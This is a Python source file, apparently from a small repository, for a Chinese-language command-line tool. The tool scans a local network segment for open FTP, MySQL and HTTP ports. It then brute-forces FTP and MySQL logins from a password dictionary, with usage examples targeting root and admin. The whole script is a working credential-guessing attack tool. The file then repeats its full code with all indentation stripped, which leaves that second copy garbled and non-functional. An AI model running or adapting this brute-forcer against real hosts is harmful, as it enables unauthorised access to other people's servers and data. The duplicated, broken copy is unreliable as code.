Z-fly/demo.py

## demo.py
import ftplib
import optparse
import os
import re
import socket
import sys
import threading
import IPy
import mysql.connector
import requests

routers = []
lock = threading.Lock()
pass_dict = os.getcwd() + r'\password.txt'
compile_ip = re.compile(r'^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$')


def search_routers(Bip=None):
    if Bip is None:
        local_ips = socket.gethostbyname_ex(socket.gethostname())[2]
    else:
        local_ips = Bip
    all_threads = []
    for lip in local_ips:
        for i in range(1, 255):
            array1 = lip.split('.')
            array1[3] = str(i)
            new_ip = '.'.join(array1)
            for port in port_list:
                dst_port = int(port)
                t = threading.Thread(target=portScan, args=(new_ip, dst_port))
                t.start()
                all_threads.append(t)
    for t in all_threads:
        t.join()


def portScan(rip, port):
    scan_link = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    scan_link.settimeout(2)
    result = scan_link.connect_ex((rip, port))
    scan_link.close()
    if result == 0:
        lock.acquire()
        print(rip.ljust(15), f'\t{port}开放')
        if port == 80:
            get_title(rip, port)
        routers.append((rip, port))
        lock.release()
    else:
        lock.acquire()
        # print(rip.ljust(15), f'\t{port}关闭')
        routers.append((rip, port))
        lock.release()


# def portScan(tgtIp, tgtPort):
#     socket.setdefaulttimeout(1)
#     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#     address = (tgtIp, tgtPort)
#     try:
#         s.connect(address)
#         print('[+] {} : open [{}] '.format(tgtIp, tgtPort))
#     except Exception as e:
#         s.close()
#         print('[+] {} : closed [{}] error : {}'.format(tgtIp, tgtPort, e))
#     s.close()


def get_title(gip, port):
    url = 'http://{}:{}'.format(gip, port)
    res = requests.get(url=url)
    try:
        title = re.search(r'<title>(.*)</title>', res.text).group(1)
        print('[{}] {}'.format(title, url))
    except:
        pass


def brute_ftp(host, pass_file):
    # user = ['root']
    for u in user:
        print('\nFTP用户名 ' + u)
        with open(pass_file, 'r') as f:
            for line in f:
                password = line.strip('\r').strip('\n')
                print('尝试密码: ', password)
                try:
                    ftp = ftplib.FTP(host)
                    ftp.login(u, password)
                    print('FTP登录 \033[1;32;40m成功\033[0m!')
                    print('FTP用户名 ' + u)
                    ftp.quit()
                    return True
                except:
                    print('FTP登录 \033[1;31;40m失败\033[0m!')
                    # return False


def brute_mysql(host, pass_file):
    # user = ['root']
    for u in user:
        print('\nMySQL用户名 ' + u)
        with open(pass_file, 'r') as f:
            for line in f:
                password = line.strip('\r').strip('\n')
                print('尝试密码: ', password)
                try:
                    mydb = mysql.connector.connect(
                        host=host,
                        user=u,
                        passwd=password
                    )
                    print('MySQL登录 \033[1;32;40m成功\033[0m!')
                    print('MySQL用户名 ' + u)
                    return True
                except:
                    print('MySQL登录 \033[1;31;40m失败\033[0m!')
                    # return False


if __name__ == '__main__':

    usage = '''直接运行或是输入其他错误参数，扫描本机所在局域网段\n
       -o 指定扫描端口，用英文逗号隔开，默认扫描3306(mysql), 21(ftp), 80(http), 443(https)\n
       扫描指定网段/ip：-i 网段/ip，如10.20.24.0/24，192.168.123.0\n
       爆破指定服务：-b ftp/mysql -i ip -u 指定用户名列表,用英文逗号隔开 -p 指定密码文件\n
       举例：demo -b mysql -i 127.0.0.1 -u root,admin -p C:\password.txt
             爆破127.0.0.1的mysql服务器密码,爆破用户名root和admin的密码\n
             demo -i 10.20.24.0/24
             扫描10.20.24.0/255.255.255.0网段下所有主机的服务
    '''
    parse = optparse.OptionParser(usage=usage)
    parse.add_option('-i', dest='add', type=str, help='网段或ip地址')
    parse.add_option('-b', dest='server', type=str, help='爆破指定服务')
    parse.add_option('-u', dest='user', type=str, help='爆破用户名')
    parse.add_option('-p', dest='pass_dict', type=str, help='密码文件')
    parse.add_option('-o', dest='port_list', type=str, help='指定端口')
    options, argv = parse.parse_args()
    # print(parse.usage)
    # print(options)
    if options.pass_dict is not None:
        pass_dict = options.pass_dict
    global user
    if options.user is not None:
        user = options.user.split(',')
    else:
        user = ['root']
    global port_list
    if options.port_list is not None:
        port_list = options.port_list.split(',')
        # for port in options.port_list.split(','):
        #     if port.find('-') != -1:
        #         p = port.split('-')
        #         print(p[0], str(int(p[1] + 1)))
        #         for port2 in range(p[0], str(int(p[1] + 1))):
        #             port_list.append(port2)
        #     else:
        #         port_list.append(port)
    else:
        port_list = ['3306', '21', '80', '443']
    if options.add is None:
        # for ip in socket.gethostbyname_ex(socket.gethostname())[2]:
        #     ips = IPy.IP(ip)
        #     ipz = []
        #     for ip in ips:
        #         array = str(ip).split('.')
        #         ip2 = f'{array[0]}.{array[1]}.{array[2]}.0'
        #         if ip2 not in ipz:
        #             ipz.append(ip2)
        #     search_routers(ipz)
        print(parse.usage)
        search_routers()
        sys.exit()
    if options.server == 'ftp':
        if options.pass_dict is not None:
            brute_ftp(options.add, pass_file=options.pass_dict)
            sys.exit()
        else:
            brute_ftp(options.add, pass_dict)
            sys.exit()
    elif options.server == 'mysql':
        if options.pass_dict is not None:
            brute_mysql(options.add, pass_file=options.pass_dict)
            sys.exit()
        else:
            brute_mysql(options.add, pass_dict)
            sys.exit()
    if options.add.find('/') == -1:
        if compile_ip.match(options.add):
            search_routers([options.add])
            sys.exit()
        else:
            print(parse.usage)
            search_routers()
            sys.exit()
    else:
        ips = IPy.IP(options.add)
        ipz = []
        for ip in ips:
            array = str(ip).split('.')
            ip2 = f'{array[0]}.{array[1]}.{array[2]}.0'
            if ip2 not in ipz:
                ipz.append(ip2)
        search_routers(ipz)
        sys.exit()

    # search_routers(['10.20.24.0'])
    # search_routers()
    # python -m pip install -i https://pypi.tuna.tsinghua.edu.cn/simple mysql-connector IPy
	import ftplib
	import optparse
	import os
	import re
	import socket
	import sys
	import threading
	import IPy
	import mysql.connector
	import requests

	routers = []
	lock = threading.Lock()
	pass_dict = os.getcwd() + r'\password.txt'
	compile_ip = re.compile(r'^((25[0-5]\|2[0-4]\d\|[01]?\d\d?)\.){3}(25[0-5]\|2[0-4]\d\|[01]?\d\d?)$')


	def search_routers(Bip=None):
	if Bip is None:
	local_ips = socket.gethostbyname_ex(socket.gethostname())[2]
	else:
	local_ips = Bip
	all_threads = []
	for lip in local_ips:
	for i in range(1, 255):
	array1 = lip.split('.')
	array1[3] = str(i)
	new_ip = '.'.join(array1)
	for port in port_list:
	dst_port = int(port)
	t = threading.Thread(target=portScan, args=(new_ip, dst_port))
	t.start()
	all_threads.append(t)
	for t in all_threads:
	t.join()


	def portScan(rip, port):
	scan_link = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	scan_link.settimeout(2)
	result = scan_link.connect_ex((rip, port))
	scan_link.close()
	if result == 0:
	lock.acquire()
	print(rip.ljust(15), f'\t{port}开放')
	if port == 80:
	get_title(rip, port)
	routers.append((rip, port))
	lock.release()
	else:
	lock.acquire()
	# print(rip.ljust(15), f'\t{port}关闭')
	routers.append((rip, port))
	lock.release()


	# def portScan(tgtIp, tgtPort):
	# socket.setdefaulttimeout(1)
	# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	# address = (tgtIp, tgtPort)
	# try:
	# s.connect(address)
	# print('[+] {} : open [{}] '.format(tgtIp, tgtPort))
	# except Exception as e:
	# s.close()
	# print('[+] {} : closed [{}] error : {}'.format(tgtIp, tgtPort, e))
	# s.close()


	def get_title(gip, port):
	url = 'http://{}:{}'.format(gip, port)
	res = requests.get(url=url)
	try:
	title = re.search(r'<title>(.*)</title>', res.text).group(1)
	print('[{}] {}'.format(title, url))
	except:
	pass


	def brute_ftp(host, pass_file):
	# user = ['root']
	for u in user:
	print('\nFTP用户名 ' + u)
	with open(pass_file, 'r') as f:
	for line in f:
	password = line.strip('\r').strip('\n')
	print('尝试密码: ', password)
	try:
	ftp = ftplib.FTP(host)
	ftp.login(u, password)
	print('FTP登录 \033[1;32;40m成功\033[0m!')
	print('FTP用户名 ' + u)
	ftp.quit()
	return True
	except:
	print('FTP登录 \033[1;31;40m失败\033[0m!')
	# return False


	def brute_mysql(host, pass_file):
	# user = ['root']
	for u in user:
	print('\nMySQL用户名 ' + u)
	with open(pass_file, 'r') as f:
	for line in f:
	password = line.strip('\r').strip('\n')
	print('尝试密码: ', password)
	try:
	mydb = mysql.connector.connect(
	host=host,
	user=u,
	passwd=password
	)
	print('MySQL登录 \033[1;32;40m成功\033[0m!')
	print('MySQL用户名 ' + u)
	return True
	except:
	print('MySQL登录 \033[1;31;40m失败\033[0m!')
	# return False


	if __name__ == '__main__':

	usage = '''直接运行或是输入其他错误参数，扫描本机所在局域网段\n
	-o 指定扫描端口，用英文逗号隔开，默认扫描3306(mysql), 21(ftp), 80(http), 443(https)\n
	扫描指定网段/ip：-i 网段/ip，如10.20.24.0/24，192.168.123.0\n
	爆破指定服务：-b ftp/mysql -i ip -u 指定用户名列表,用英文逗号隔开 -p 指定密码文件\n
	举例：demo -b mysql -i 127.0.0.1 -u root,admin -p C:\password.txt
	爆破127.0.0.1的mysql服务器密码,爆破用户名root和admin的密码\n
	demo -i 10.20.24.0/24
	扫描10.20.24.0/255.255.255.0网段下所有主机的服务
	'''
	parse = optparse.OptionParser(usage=usage)
	parse.add_option('-i', dest='add', type=str, help='网段或ip地址')
	parse.add_option('-b', dest='server', type=str, help='爆破指定服务')
	parse.add_option('-u', dest='user', type=str, help='爆破用户名')
	parse.add_option('-p', dest='pass_dict', type=str, help='密码文件')
	parse.add_option('-o', dest='port_list', type=str, help='指定端口')
	options, argv = parse.parse_args()
	# print(parse.usage)
	# print(options)
	if options.pass_dict is not None:
	pass_dict = options.pass_dict
	global user
	if options.user is not None:
	user = options.user.split(',')
	else:
	user = ['root']
	global port_list
	if options.port_list is not None:
	port_list = options.port_list.split(',')
	# for port in options.port_list.split(','):
	# if port.find('-') != -1:
	# p = port.split('-')
	# print(p[0], str(int(p[1] + 1)))
	# for port2 in range(p[0], str(int(p[1] + 1))):
	# port_list.append(port2)
	# else:
	# port_list.append(port)
	else:
	port_list = ['3306', '21', '80', '443']
	if options.add is None:
	# for ip in socket.gethostbyname_ex(socket.gethostname())[2]:
	# ips = IPy.IP(ip)
	# ipz = []
	# for ip in ips:
	# array = str(ip).split('.')
	# ip2 = f'{array[0]}.{array[1]}.{array[2]}.0'
	# if ip2 not in ipz:
	# ipz.append(ip2)
	# search_routers(ipz)
	print(parse.usage)
	search_routers()
	sys.exit()
	if options.server == 'ftp':
	if options.pass_dict is not None:
	brute_ftp(options.add, pass_file=options.pass_dict)
	sys.exit()
	else:
	brute_ftp(options.add, pass_dict)
	sys.exit()
	elif options.server == 'mysql':
	if options.pass_dict is not None:
	brute_mysql(options.add, pass_file=options.pass_dict)
	sys.exit()
	else:
	brute_mysql(options.add, pass_dict)
	sys.exit()
	if options.add.find('/') == -1:
	if compile_ip.match(options.add):
	search_routers([options.add])
	sys.exit()
	else:
	print(parse.usage)
	search_routers()
	sys.exit()
	else:
	ips = IPy.IP(options.add)
	ipz = []
	for ip in ips:
	array = str(ip).split('.')
	ip2 = f'{array[0]}.{array[1]}.{array[2]}.0'
	if ip2 not in ipz:
	ipz.append(ip2)
	search_routers(ipz)
	sys.exit()

	# search_routers(['10.20.24.0'])
	# search_routers()
	# python -m pip install -i https://pypi.tuna.tsinghua.edu.cn/simple mysql-connector IPy